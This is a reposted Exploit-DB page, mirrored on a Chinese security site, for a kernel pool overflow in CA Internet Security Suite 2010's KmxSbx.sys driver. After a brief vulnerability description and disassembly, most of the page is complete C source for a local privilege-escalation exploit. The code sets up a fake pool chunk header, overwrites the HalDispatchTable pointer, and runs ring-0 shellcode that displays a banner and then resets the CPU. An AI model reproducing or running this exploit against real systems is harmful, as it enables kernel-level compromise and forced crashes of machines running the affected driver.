首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CA Internet Security Suite 2010 KmxSbx.sys Kernel Pool Overflow 0 day Exploit
来源:http://www.exploit-db.com/exploits/15624/ 作者:Tarakanov 发布时间:2010-11-29  

/*
# Exploit Title: CA Internet Security Suite 2010 KmxSbx.sys Kernel Pool
Overflow 0-day Exploit
# Date: 2010-11-28
# Author: Nikita Tarakanov (CISS Research Team)
# Software Link:
http://shop.ca.com/ca/products/internetsecurity/internetsecurity_suite.asp
# Version: up to date, KmxSbx.sys version 6.2.0.22
# Tested on: Win XP SP3
# CVE : CVE-NO-MATCH
# Status : Unpatched
*/

1.Description:

The KmxSbx.sys kernel driver distributed with CA Security Suite contains
a pool corruption vulnerability in the handling of IOCTL 0x88000080.
Exploitation of this issue allows an attacker to execute arbitrary code
within the kernel.
An attacker would need local access to a vulnerable computer to exploit
this vulnerability.

 

Affected application: CA Internet Security Suite 2010.
Affected file: KmxSbx.sys version 6.2.0.22.

2.Vulnerability details:


[..]

.text:00016330                 mov     cx, [eax]       ; eax points to
attacker controlled data
.text:00016333                 inc     eax
.text:00016334                 inc     eax
.text:00016335                 test    cx, cx
.text:00016338                 jnz     short loc_16330
.text:0001633A                 sub     eax, edx
.text:0001633C                 sar     eax, 1
.text:0001633E                 lea     eax, [eax+eax+50h] ; size of
UNICODE string + 0x50 bytes
.text:00016342                 movzx   edi, ax         ; integer wrap here!
.text:00016345
.text:00016345 loc_16345:                              ; CODE XREF:
sub_162D8+53j
.text:00016345                 movzx   eax, di
.text:00016348                 push    ebx
.text:00016349                 xor     ebx, ebx
.text:0001634B                 cmp     eax, ebx
.text:0001634D                 jz      short loc_16359
.text:0001634F                 push    eax             ; NumberOfBytes
.text:00016350                 push    ebx             ; PoolType
.text:00016351                 call    ds:ExAllocatePool ; Miscalculated
Pool!!!
.text:00016357                 mov     ebx, eax

[..]

.text:000163A6                 movzx   esi, word ptr [edx]
.text:000163A9                 mov     [eax+edx], si   ; Pool overflow here!
.text:000163AD                 inc     edx
.text:000163AE                 inc     edx
.text:000163AF                 test    si, si

 


3.Exploitation:


1.To exploit this vulnerability we have to allocate shellcode at some
address, craft fake chunk header, that creates write4 primitive.
2.To invoke our shellcode we have to set such values in Flink,Blink,
that points to some pointer in kernel space, and address of our r0
shellcode.When unlinking happens, we overwrite pointer in kernel space,
and force execution with kernel priviligies(cpl==0).
*3.Pool repair

Exploit code is in CAInternetSecuritySuite2010.zip file.

http://www.exploit-db.com/sploits/CAInternetSecuritySuite2010.zip

----------------------------KmxSBx_LPE_POC.c--------------------

 

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include "KmxSbx_LPE_POC.h"
#include "InvbShellCode.h"


#define THREADCOUNT 0x10

static unsigned char freeze[] =
  "\xeb\xfe";//jmp $0
static unsigned char near_jump_2_r0_shellcode[] =
  "\xeb\x06";//jmp +8

 

DWORD WINAPI ForceToAllocSpace(LPVOID lpParam);

 

int main(int argc, char **argv)
{
 HANDLE   hDevice;
 HANDLE hThr[THREADCOUNT];
 char *inbuff;
 DWORD ioctl = 0x88000080, in = 0x1C000, out = 0x100, len, zlen, ppid, i;
 DWORD  fake_header = 0x201ff,first_dword = 0x400, r0_shellcode_addr, r0_pointer_addr, junk;
 //DWORD r0_shellcode_addr = 0xDEADBEEF;
 //DWORD r0_pointer_addr = 0xDEADCODE;

 LPVOID zpage, zbuf;
 NTSTATUS NtStatus;
    ULONG AllocationSize = PAGE_SIZE * 64;
    ULONG ImageBase;
    PVOID MappedBase;
    UCHAR ImageName[KERNEL_NAME_LENGTH];
    ULONG DllCharacteristics = DONT_RESOLVE_DLL_REFERENCES;

    PVOID HalDispatchTable;
    PVOID xHalQuerySystemInformation;
 PSYSTEM_MODULE_INFORMATION_EX ModuleInformation = NULL;
    UNICODE_STRING DllName;
    //UNICODE_STRING DriverServiceName;
    ANSI_STRING ProcedureName;

 


 //Get address of pointer
    NtStatus = NtAllocateVirtualMemory(
                                       NtCurrentProcess(), // ProcessHandle
                                       &ModuleInformation, // BaseAddress
                                       0,                  // ZeroBits
                                       &AllocationSize,    // AllocationSize
                                       MEM_COMMIT,         // AllocationType
                                       PAGE_READWRITE);    // Protect

    //if(NtStatus)
    //{
    //    printf(" [*] NtStatus of NtAllocateVirtualMemory [1] - 0x%.8X\n", NtStatus);   
    //    return NtStatus;
    //}

    ///////////////////////////////////////////////////////////////////////////////////////////////

    NtStatus = NtQuerySystemInformation(
                                        SystemModuleInformation, // SystemInformationClass
                                        ModuleInformation,       // SystemInformation
                                        AllocationSize,          // SystemInformationLength
                                        NULL);                   // ReturnLength

    //if(NtStatus)
    //{
    //    printf(" [*] NtStatus of NtQuerySystemInformation - 0x%.8X\n", NtStatus);   
    //    return NtStatus;
    //}

    ImageBase = (ULONG)(ModuleInformation->Modules[0].Base);


    RtlMoveMemory(
                  ImageName,
                  (PVOID)(ModuleInformation->Modules[0].ImageName +
                  ModuleInformation->Modules[0].ModuleNameOffset),
                  KERNEL_NAME_LENGTH);

    //printf( " +----------------------------------------------------------------------------+\n"
    //        " | ImageBase - 0x%.8X                                                     |\n"
    //        " | ImageName - %s                                                   |\n",
    //        ImageBase,
    //        ImageName);


    NtStatus = NtFreeVirtualMemory(
                                   NtCurrentProcess(), // ProcessHandle
                                   &ModuleInformation, // BaseAddress
                                   &AllocationSize,    // FreeSize
                                   MEM_DECOMMIT);      // FreeType

    //if(NtStatus)
    //{
    //    printf(" [*] NtStatus of NtFreeVirtualMemory [1] - 0x%.8X\n", NtStatus);
    //    return NtStatus;
    //}

    ///////////////////////////////////////////////////////////////////////////////////////////////

    RtlCreateUnicodeStringFromAsciiz(&DllName, (PUCHAR)ImageName);


    NtStatus = LdrLoadDll(
                          NULL,                // DllPath
                          &DllCharacteristics, // DllCharacteristics
                          &DllName,            // DllName
                          &MappedBase);        // DllHandle

    //if(NtStatus)
    //{
    //    printf(" [*] NtStatus of LdrLoadDll - 0x%.8X\n", NtStatus);   
    //    return NtStatus;
    //}

    RtlInitAnsiString(&ProcedureName, "HalDispatchTable");


    NtStatus = LdrGetProcedureAddress(
                                      (PVOID)MappedBase,          // DllHandle
                                      &ProcedureName,             // ProcedureName
                                      0,                          // ProcedureNumber OPTIONAL
                                      (PVOID*)&HalDispatchTable); // ProcedureAddress

    //if(NtStatus)
    //{
    //    printf(" [*] NtStatus of LdrGetProcedureAddress - 0x%.8X\n", NtStatus);   
    //    return NtStatus;
    //}

    (ULONG)HalDispatchTable -= (ULONG)MappedBase;
    (ULONG)HalDispatchTable += ImageBase;

    (ULONG)xHalQuerySystemInformation = (ULONG)HalDispatchTable + sizeof(ULONG);

    printf( " |                                                                            |\n"
            " | HalDispatchTable - 0x%.8x                                              |\n"
            " | xHalQuerySystemInformation - 0x%.8x                                    |\n"
            " +----------------------------------------------------------------------------+\n",
            HalDispatchTable,
            xHalQuerySystemInformation);


    NtStatus = XxInitInbv(ImageBase, (ULONG)MappedBase);

 if(NtStatus)
 {
  printf(" [*] NtStatus of XxInitInbv - 0x%.8X\n", NtStatus); 
  return NtStatus;
 }

 

 

 zpage = VirtualAlloc(NULL, 0x2000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 if (zpage == NULL)
 {
  printf("VirtualAlloc failed\n");
  return 0;
 }
 printf("Ring 0 shellcode at 0x%08X address\n", (DWORD)zpage + 1);

 memset(zpage, 0xCC, 0x1000);
 //copy shellcode
 //memcpy((PCHAR)zpage + 1, (PCHAR)zbuf, zlen);
 //memcpy((PCHAR)zpage + 1 + zlen, (PCHAR)freeze, sizeof (freeze) - 1);
 memcpy((PCHAR)zpage + 1, (PCHAR)near_jump_2_r0_shellcode, sizeof(near_jump_2_r0_shellcode) - 1);
 memcpy((PCHAR)zpage + 9, InbvShellCode, 0x1000);


 if ( (hDevice = CreateFileA("\\\\.\\KmxSbx",
        GENERIC_READ|GENERIC_WRITE,
        0,
        0,
        OPEN_EXISTING,
        0,
        NULL) ) != INVALID_HANDLE_VALUE )
 {
  printf("Device succesfully opened!\n");
 }
 else
 {
  printf("Error: Error opening device \n");
  return 0;
 } 
 
 inbuff = (char *)malloc(0x1C000);
 if(!inbuff){
  printf("malloc failed!\n");
  return 0;
 }

 //Crafting write input buffer
 memset(inbuff, 'A', 0x1C000-1);
 memset(inbuff+0x11032, 0x00, 2);//end of unicode, size to allocate 0xff0
 
 memcpy(inbuff+0x1050, &fake_header, 4);//Previod Size, PoolIndex and BlockSize 0x201ff (Previos = 0x1ff (0xff0), PoolType = 0(free), BlockSize = 2)
 //to get BSOD with PF
 //memset(inbuff+0x1058, 'B', 0x4);//Flibk
 //memset(inbuff+0x105C, 'C', 0x4);//Blink
 r0_shellcode_addr = (DWORD)zpage + 1;
 r0_pointer_addr = (DWORD)xHalQuerySystemInformation;
 memcpy(inbuff+0x1058, &r0_shellcode_addr, 0x4);//Flibk
 memcpy(inbuff+0x105C, &r0_pointer_addr, 0x4);//Blink
 
 

 memcpy(inbuff, &first_dword, sizeof(DWORD));


 //Force to allocate chunks of 0xff0 len
 for(i = 0; i < THREADCOUNT; i++){
  DWORD ThreadId;
  hThr[i] = CreateThread(NULL, 0, ForceToAllocSpace, hDevice, 0, &ThreadId);
 }

 WaitForMultipleObjects(THREADCOUNT,hThr,FALSE,INFINITE);

     for(i=0;i<THREADCOUNT;i++)
   CloseHandle(hThr[i]);
 //Sleep(100);

 DeviceIoControl(hDevice, ioctl, (LPVOID)inbuff, in, (LPVOID)inbuff, out, &len, NULL);
 //free(inbuff);

 

 

 
    NtStatus = NtQueryIntervalProfile(
                                      ProfileTotalIssues, // Source
                                      &junk);              // Interval

 /*
    if(NtStatus)
    {
        printf(" [*] NtStatus of NtQueryIntervalProfile - 0x%.8X\n", NtStatus);
        return NtStatus;
    }
 */


 Sleep(1000000);

 return 0;

}

DWORD WINAPI ForceToAllocSpace(LPVOID lpParam)
{
 char* inbuff;
 HANDLE hDev = (HANDLE)lpParam;
 DWORD in = 0x1C00, out = 0x100, ioctl = 0x88000080, first_dword = 0x400, i = 0, len;

 inbuff = (char *)malloc(0x1C00);
 if(!inbuff){
  printf("malloc failed!\n");
  return 0;
 }

 for(;i < 0x10; i++){
  //Crafting write input buffer
  memset(inbuff, 'A', 0x1C00-1);
  memset(inbuff+0x1032, 0x00, 2);//end of unicode, size to allocate 0xff0
   
  
  memcpy(inbuff, &first_dword, sizeof(DWORD));

  DeviceIoControl(hDev, ioctl, (LPVOID)inbuff, in, (LPVOID)inbuff, out, &len, NULL);
 }

 //free(inbuff);

 return 0;
}

------------------------------KmxSBx_LPE_POC.h---------------

#define IMP_VOID __declspec(dllimport) VOID __stdcall
#define IMP_SYSCALL __declspec(dllimport) NTSTATUS __stdcall

#define PAGE_SIZE 0x1000

#define OBJ_CASE_INSENSITIVE 0x00000040
#define FILE_OPEN_IF 0x00000003

#define NtCurrentProcess() ((HANDLE)0xFFFFFFFF)

#define KERNEL_NAME_LENGTH 0x0D

#define STATUS_SUCCESS 0x00000000

typedef ULONG NTSTATUS;

typedef struct ANSI_STRING
{
    /* 0x00 */ USHORT Length;
    /* 0x02 */ USHORT MaximumLength;
    /* 0x04 */ PCHAR Buffer;
    /* 0x08 */
}
    ANSI_STRING,
  *PANSI_STRING,
**PPANSI_STRING;

typedef struct _UNICODE_STRING
{
    /* 0x00 */ USHORT Length;
    /* 0x02 */ USHORT MaximumLength;
    /* 0x04 */ PWSTR Buffer;
    /* 0x08 */
}
    UNICODE_STRING,
  *PUNICODE_STRING,
**PPUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES
{
    /* 0x00 */ ULONG Length;
    /* 0x04 */ HANDLE RootDirectory;
    /* 0x08 */ PUNICODE_STRING ObjectName;
    /* 0x0C */ ULONG Attributes;
    /* 0x10 */ PSECURITY_DESCRIPTOR SecurityDescriptor;
    /* 0x14 */ PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;
    /* 0x18 */
}
    OBJECT_ATTRIBUTES,
  *POBJECT_ATTRIBUTES,
**PPOBJECT_ATTRIBUTES;

typedef struct _IO_STATUS_BLOCK
{
    union
    {
        /* 0x00 */ NTSTATUS Status;
        /* 0x00 */ PVOID Pointer;
    };

    /* 0x04 */ ULONG Information;
    /* 0x08 */
}
    IO_STATUS_BLOCK,
  *PIO_STATUS_BLOCK,
**PPIO_STATUS_BLOCK;

typedef enum _SYSTEM_INFORMATION_CLASS
{
    SystemBasicInformation,
    SystemProcessorInformation,
    SystemPerformanceInformation,
    SystemTimeOfDayInformation,
    SystemNotImplemented1,
    SystemProcessesAndThreadsInformation,
    SystemCallCounts,
    SystemConfigurationInformation,
    SystemProcessorTimes,
    SystemGlobalFlag,
    SystemNotImplemented2,
    SystemModuleInformation,
    SystemLockInformation,
    SystemNotImplemented3,
    SystemNotImplemented4,
    SystemNotImplemented5,
    SystemHandleInformation,
    SystemObjectInformation,
    SystemPagefileInformation,
    SystemInstructionEmulationCounts,
    SystemInvalidInfoClass1,
    SystemCacheInformation,
    SystemPoolTagInformation,
    SystemProcessorStatistics,
    SystemDpcInformation,
    SystemNotImplemented6,
    SystemLoadImage,
    SystemUnloadImage,
    SystemTimeAdjustment,
    SystemNotImplemented7,
    SystemNotImplemented8,
    SystemNotImplemented9,
    SystemCrashDumpInformation,
    SystemExceptionInformation,
    SystemCrashDumpStateInformation,
    SystemKernelDebuggerInformation,
    SystemContextSwitchInformation,
    SystemRegistryQuotaInformation,
    SystemLoadAndCallImage,
    SystemPrioritySeparation,
    SystemNotImplemented10,
    SystemNotImplemented11,
    SystemInvalidInfoClass2,
    SystemInvalidInfoClass3,
    SystemTimeZoneInformation,
    SystemLookasideInformation,
    SystemSetTimeSlipEvent,
    SystemCreateSession,
    SystemDeleteSession,
    SystemInvalidInfoClass4,
    SystemRangeStartInformation,
    SystemVerifierInformation,
    SystemAddVerifier,
    SystemSessionProcessesInformation
} SYSTEM_INFORMATION_CLASS;

typedef struct _SYSTEM_MODULE_INFORMATION
{
    /* 0x0000 */ ULONG Reserved[2];
    /* 0x0008 */ PVOID Base;
    /* 0x000C */ ULONG Size;
    /* 0x0010 */ ULONG Flags;
    /* 0x0014 */ USHORT Index;
    /* 0x0016 */ USHORT Unknown;
    /* 0x0018 */ USHORT LoadCount;
    /* 0x001A */ USHORT ModuleNameOffset;
    /* 0x001C */ UCHAR ImageName[256];
    /* 0x011C */
}
    SYSTEM_MODULE_INFORMATION,
  *PSYSTEM_MODULE_INFORMATION,
**PPSYSTEM_MODULE_INFORMATION;

typedef struct _SYSTEM_MODULE_INFORMATION_EX
{
    /* 0x00 */ ULONG ModulesCount;
    /* 0x04 */ SYSTEM_MODULE_INFORMATION Modules[0];
    /* 0xXX */
}
    SYSTEM_MODULE_INFORMATION_EX,
  *PSYSTEM_MODULE_INFORMATION_EX,
**PPSYSTEM_MODULE_INFORMATION_EX;

typedef enum _KPROFILE_SOURCE
{
    ProfileTime,
    ProfileAlignmentFixup,
    ProfileTotalIssues,
    ProfilePipelineDry,
    ProfileLoadInstructions,
    ProfilePipelineFrozen,
    ProfileBranchInstructions,
    ProfileTotalNonissues,
    ProfileDcacheMisses,
    ProfileIcacheMisses,
    ProfileCacheMisses,
    ProfileBranchMispredictions,
    ProfileStoreInstructions,
    ProfileFpInstructions,
    ProfileIntegerInstructions,
    Profile2Issue,
    Profile3Issue,
    Profile4Issue,
    ProfileSpecialInstructions,
    ProfileTotalCycles,
    ProfileIcacheIssues,
    ProfileDcacheAccesses,
    ProfileMemoryBarrierCycles,
    ProfileLoadLinkedIssues,
    ProfileMaximum
} KPROFILE_SOURCE;

typedef VOID (NTAPI *PIO_APC_ROUTINE)
(
    IN PVOID ApcContext,
    IN PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG Reserved
);

IMP_VOID RtlInitAnsiString
(
    IN OUT PANSI_STRING  DestinationString,
    IN PUCHAR SourceString
);

IMP_VOID RtlInitUnicodeString
(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
);

IMP_VOID RtlCreateUnicodeStringFromAsciiz
(
    OUT PUNICODE_STRING DestinationString, 
    IN PUCHAR SourceString
);

IMP_VOID RtlFreeUnicodeString
(
    IN PUNICODE_STRING UnicodeString
);

IMP_VOID RtlFreeAnsiString
(
    IN PANSI_STRING AnsiString
);

IMP_SYSCALL LdrLoadDll
(
    IN PWSTR DllPath OPTIONAL,
    IN PULONG DllCharacteristics OPTIONAL,
    IN PUNICODE_STRING DllName,
    OUT PVOID *DllHandle
);

IMP_SYSCALL LdrUnloadDll
(
    IN PVOID DllHandle
);

IMP_SYSCALL LdrGetProcedureAddress
(
    IN PVOID DllHandle,
    IN PANSI_STRING ProcedureName OPTIONAL,
    IN ULONG ProcedureNumber OPTIONAL,
    OUT PVOID *ProcedureAddress
);

IMP_SYSCALL NtAllocateVirtualMemory
(
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,
    IN ULONG ZeroBits,
    IN OUT PULONG AllocationSize,
    IN ULONG AllocationType,
    IN ULONG Protect
);

IMP_SYSCALL NtFreeVirtualMemory
(
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,
    IN OUT PULONG FreeSize,
    IN ULONG FreeType
);

IMP_SYSCALL NtQuerySystemInformation
(
    IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength OPTIONAL
);

IMP_SYSCALL NtCreateFile
(
    OUT PHANDLE FileHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN PLARGE_INTEGER AllocationSize OPTIONAL,
    IN ULONG FileAttributes,
    IN ULONG ShareAccess,
    IN ULONG CreateDisposition,
    IN ULONG CreateOptions,
    IN PVOID EaBuffer OPTIONAL,
    IN ULONG EaLength
);

IMP_SYSCALL NtDeviceIoControlFile
(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG IoControlCode,
    IN PVOID InputBuffer OPTIONAL,
    IN ULONG InputBufferLength,
    OUT PVOID OutputBuffer OPTIONAL,
    IN ULONG OutputBufferLength
);

IMP_SYSCALL NtDelayExecution
(
    IN BOOLEAN Alertable,
    IN PLARGE_INTEGER Interval
);

IMP_SYSCALL NtQueryIntervalProfile
(
    IN KPROFILE_SOURCE Source,
    OUT PULONG Interval
);

IMP_SYSCALL NtClose
(
    IN HANDLE Handle
);

--------------------------InvbShellcode.h----------------------

#include <stdio.h>

typedef VOID (*INBV_DISPLAY_STRING_FILTER)
(
    PUCHAR *String
);

VOID (__stdcall *InbvAcquireDisplayOwnership)
(
    VOID
);

VOID (__stdcall *InbvDisplayString)
(
    IN PCHAR String
);

VOID (__stdcall *InbvEnableDisplayString)
(
    IN BOOLEAN Enable
);

VOID (__stdcall *InbvInstallDisplayStringFilter)
(
    IN INBV_DISPLAY_STRING_FILTER Filter
);

VOID (__stdcall *InbvResetDisplay)
(
    VOID
);

VOID (__stdcall *InbvSetScrollRegion)
(
    IN ULONG Left,
    IN ULONG Top,
    IN ULONG Width,
    IN ULONG Height
);

VOID (__stdcall *InbvSetTextColor)
(
    IN ULONG Color
);

VOID (__stdcall *InbvSolidColorFill)
(
    IN ULONG Left,
    IN ULONG Top,
    IN ULONG Width,
    IN ULONG Height,
    IN ULONG Color
);

NTSTATUS XxInitInbv(IN ULONG ImageBase, IN ULONG MappedBase)
{
    NTSTATUS NtStatus;

    ANSI_STRING ProcedureName;


    //
    // InbvAcquireDisplayOwnership
    //

    RtlInitAnsiString(&ProcedureName, "InbvAcquireDisplayOwnership");

    NtStatus = LdrGetProcedureAddress(
                                      (PVOID)MappedBase,                     // DllHandle
                                      &ProcedureName,                        // ProcedureName
                                      0,                                     // ProcedureNumber OPTIONAL
                                      (PVOID*)&InbvAcquireDisplayOwnership); // ProcedureAddress

    if(NtStatus)
    {
        printf(" [*] NtStatus of LdrGetProcedureAddress - InbvAcquireDisplayOwnership - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    (ULONG)InbvAcquireDisplayOwnership -= MappedBase;
    (ULONG)InbvAcquireDisplayOwnership += ImageBase;
   

    //
    // InbvResetDisplay
    //

    RtlInitAnsiString(&ProcedureName, "InbvResetDisplay");

    NtStatus = LdrGetProcedureAddress(
                                      (PVOID)MappedBase,
                                      &ProcedureName,
                                      0,
                                      (PVOID*)&InbvResetDisplay);

    if(NtStatus)
    {
        printf(" [*] NtStatus of LdrGetProcedureAddress - InbvResetDisplay - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    (ULONG)InbvResetDisplay -= MappedBase;
    (ULONG)InbvResetDisplay += ImageBase;


    //
    // InbvSolidColorFill
    //

    RtlInitAnsiString(&ProcedureName, "InbvSolidColorFill");

    NtStatus = LdrGetProcedureAddress(
                                      (PVOID)MappedBase,
                                      &ProcedureName,
                                      0,
                                      (PVOID*)&InbvSolidColorFill);

    if(NtStatus)
    {
        printf(" [*] NtStatus of LdrGetProcedureAddress - InbvSolidColorFill - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    (ULONG)InbvSolidColorFill -= MappedBase;
    (ULONG)InbvSolidColorFill += ImageBase;


    //
    // InbvSetTextColor
    //

    RtlInitAnsiString(&ProcedureName, "InbvSetTextColor");

    NtStatus = LdrGetProcedureAddress(
                                      (PVOID)MappedBase,
                                      &ProcedureName,
                                      0,
                                      (PVOID*)&InbvSetTextColor);

    if(NtStatus)
    {
        printf(" [*] NtStatus of LdrGetProcedureAddress - InbvSetTextColor - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    (ULONG)InbvSetTextColor -= MappedBase;
    (ULONG)InbvSetTextColor += ImageBase;


    //
    // InbvInstallDisplayStringFilter
    //

    RtlInitAnsiString(&ProcedureName, "InbvInstallDisplayStringFilter");

    NtStatus = LdrGetProcedureAddress(
                                      (PVOID)MappedBase,
                                      &ProcedureName,
                                      0,
                                      (PVOID*)&InbvInstallDisplayStringFilter);

    if(NtStatus)
    {
        printf(" [*] NtStatus of LdrGetProcedureAddress - InbvInstallDisplayStringFilter - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    (ULONG)InbvInstallDisplayStringFilter -= MappedBase;
    (ULONG)InbvInstallDisplayStringFilter += ImageBase;


    //
    // InbvEnableDisplayString
    //

    RtlInitAnsiString(&ProcedureName, "InbvEnableDisplayString");

    NtStatus = LdrGetProcedureAddress(
                                      (PVOID)MappedBase,
                                      &ProcedureName,
                                      0,
                                      (PVOID*)&InbvEnableDisplayString);

    if(NtStatus)
    {
        printf(" [*] NtStatus of LdrGetProcedureAddress - InbvEnableDisplayString - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    (ULONG)InbvEnableDisplayString -= MappedBase;
    (ULONG)InbvEnableDisplayString += ImageBase;


    //
    // InbvSetScrollRegion
    //

    RtlInitAnsiString(&ProcedureName, "InbvSetScrollRegion");

    NtStatus = LdrGetProcedureAddress(
                                      (PVOID)MappedBase,
                                      &ProcedureName,
                                      0,
                                      (PVOID*)&InbvSetScrollRegion);

    if(NtStatus)
    {
        printf(" [*] NtStatus of LdrGetProcedureAddress - InbvSetScrollRegion - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    (ULONG)InbvSetScrollRegion -= MappedBase;
    (ULONG)InbvSetScrollRegion += ImageBase;


    //
    // InbvDisplayString
    //

    RtlInitAnsiString(&ProcedureName, "InbvDisplayString");

    NtStatus = LdrGetProcedureAddress(
                                      (PVOID)MappedBase,
                                      &ProcedureName,
                                      0,
                                      (PVOID*)&InbvDisplayString);

    if(NtStatus)
    {
        printf(" [*] NtStatus of LdrGetProcedureAddress - InbvDisplayString - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    (ULONG)InbvDisplayString -= MappedBase;
    (ULONG)InbvDisplayString += ImageBase;


    printf(" +----------------------------------------------------------------------------+\n"
           " | InbvAcquireDisplayOwnership - 0x%.8X                                   |\n"
           " | InbvResetDisplay - 0x%.8X                                              |\n"
           " | InbvSolidColorFill - 0x%.8X                                            |\n"
           " | InbvSetTextColor - 0x%.8X                                              |\n"
           " | InbvInstallDisplayStringFilter - 0x%.8X                                |\n"
           " | InbvEnableDisplayString - 0x%.8X                                       |\n"
           " | InbvSetScrollRegion - 0x%.8X                                           |\n"
           " | InbvDisplayString - 0x%.8X                                             |\n"
           " +----------------------------------------------------------------------------+\n\n",
           InbvAcquireDisplayOwnership,
           InbvResetDisplay,
           InbvSolidColorFill,
           InbvSetTextColor,
           InbvInstallDisplayStringFilter,
           InbvEnableDisplayString,
           InbvSetScrollRegion,
           InbvDisplayString);

    RtlFreeAnsiString(&ProcedureName);

    return STATUS_SUCCESS;
}

VOID InbvShellCode()
{
    UCHAR BugCheck01[] = " 3";
    UCHAR BugCheck02[] = " 2";
    UCHAR BugCheck03[] = " 1";
    UCHAR BugCheck04[] = " Rebooting ...";
    UCHAR BugCheckString[] =
 " MONTH OF ANTIVIRUS BUGS                                                        "
    " Affected Software: CA Security Suite 2010                                      "
    " Affected Driver: KmxSbx.sys                                                    "
    " Local Privilege Escalation Proof of Concept                                    "
    " For Educational Purposes Only !                                                "
    " Discovered by CISS Research Team                                               "
    "                                                                                ";

    __asm
    {
        //
        // KeDisableInterrupts
        //
        pushf
        pop eax
        and eax, 0x0200
        shr eax, 0x09
        cli
       
        //
        // Prepareing Screen
        //
        call InbvAcquireDisplayOwnership
       
        call InbvResetDisplay
 
        sub esi, esi
        push 0x04
        mov edi, 0x01DF
        push edi
        mov ebx, 0x027F
        push ebx
        push esi
        push esi
        call InbvSolidColorFill   
       
        push 0x0F
        call InbvSetTextColor
       
        push esi
        call InbvInstallDisplayStringFilter
       
        inc esi
        push esi
        call InbvEnableDisplayString
       
        dec edi
        dec edi
        push edi
        push ebx
        dec esi
        push esi
        push esi
        call InbvSetScrollRegion
       
        lea eax, BugCheckString
        push eax
        call InbvDisplayString
           
        mov esi, 0x80000000
        mov ecx, esi
       
        //
        // Countdown
        //
    __loop01:
        dec ecx
        jnz __loop01
       
        lea eax, BugCheck01
        push eax
        call InbvDisplayString

        mov ecx, esi

    __loop02:
        dec ecx
        jnz __loop02

        lea eax, BugCheck02
        push eax
        call InbvDisplayString

        mov ecx, esi

    __loop03:
        dec ecx
        jnz __loop03

        lea eax, BugCheck03
        push eax
        call InbvDisplayString

        mov ecx, esi

    __loop04:
        dec ecx
        jnz __loop04

        lea eax, BugCheck04
        push eax
        call InbvDisplayString

        mov ecx, esi
        shl ecx, 0x01

    __loop05:
        dec ecx
        jnz __loop05
       
        //
        // Reseting Processor
        //
        mov al, 0xFE
        out 0x64, al
    }
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MemHT Portal 4.0.1 [user agent
·OTSTurntables 1.00.048 (m3u/of
·Linux Kernel Unix Sockets Loca
·Hanso Player Version 1.4.0 (.m
·Local Root Privilege Escalatio
·Linux Kernel 'setup_arg_pages(
·OSX/Intel - setuid shell x86_6
·Linux/ARM - add root user with
·Mediacoder 0.7.5.4792 Buffer O
·NCH Officeintercom <= v5.20 Re
·HP LaserJet Directory Traversa
·FoxPlayer v2.4.0 Denial of Ser
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved